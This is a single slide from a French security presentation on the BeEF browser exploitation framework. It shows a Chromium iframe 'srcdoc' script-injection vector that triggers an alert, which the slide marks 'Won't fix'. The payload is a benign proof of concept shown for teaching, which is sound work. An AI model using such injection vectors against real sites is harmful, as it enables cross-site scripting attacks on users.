  • 43. Présentation BeEF - RéSIST Septembre 2012 Bonus : Vulnérabilité Chromium <iframe srcdoc="&lt;script&gt;alert(2)&lt;/script&gt;"></iframe> Status : Won’t fix ! https://code.google.com/p/chromium/issues/detail?id=148360 Page 43 © MDAL SARL. All rights reserved. Confidential and proprietary document.